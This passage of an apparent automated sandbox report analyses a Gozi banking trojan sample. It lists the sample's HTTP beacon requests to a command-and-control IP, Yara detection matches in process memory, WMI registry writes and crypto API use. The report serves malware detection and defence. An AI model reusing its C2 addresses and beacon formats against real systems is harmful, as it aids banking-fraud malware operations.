Source: global traffic HTTP traffic detected: GET /jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZs5LHn1/1_2BHT6MZAolHFOS/6QcVb6Sy1jmNhbf/GYszPrGfJFenuaRQz6/_2BhFQScX/2I2_2FVeVKW5cCoy7gT4/8KYwuw3rx60555o08Kn/opCh843XnHy29nfuXF6b2z/huTk_2FUjzUDI/ISxuKPlx/DZKqk4ugdLqCYc3dzjZ_2Br/21q0mwi2jT/PIT_2FnEyJ3MqtVh6/qexCz0xFpyCT/BYpr5_2B38q/mb5tW8uXYlLBsL/HRJTV7U9DpT/Lb.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSaztxByX/Gj2CVVFo49mQFm/C9zaruRo3JRcHrjSr91x3/QFYBC_2FsxN_2B7X/uufaTAjpOm99699/Pq_2FSETrsZSqN9Ojz/3qeuXW2xr/R0a72t7BsPAzZ_2BbGig/RJ4QPZizbCIE_2Fbc3V/bnU9fiqNJ0ptmBxGj2iZqV/2_2BtpYpuaB39/FW0ST0qr/ePsn6GFPOwexxSy3EgaplHS/uHjfw_2BI_/2BU_2B8F8OF00pKIM/YJkKjo7czRDc/E_2BThKsX/cG_2Fr.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv_2Ft/Q5KyRgYr/iv5NSA792h1xHcDS5L6fsEG/6f6Mo_2Fxe/zRCCWBAwTeLJqLbV9/kqNgWULptALz/6SvcsPi5EHX/ePWs4WCPyL8a8x/7zSS0_2F0FPHafzsv8Nrj/_2FvbJqIrbuIliTu/28Zs8gl0EBncgLE/E0Xb7wwqBhrlCP2lDF/LuKqKVbSw/I0P0F2TMmM1CY00Wt6n5/Qvz8fbopIWFtWKI6Q1E/CrYECeKd/SC2ahZciZ/j0v83.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR

E-Banking Fraud

barindex
Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D52F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_050D52F6

System Summary

barindex
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: 7078612.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
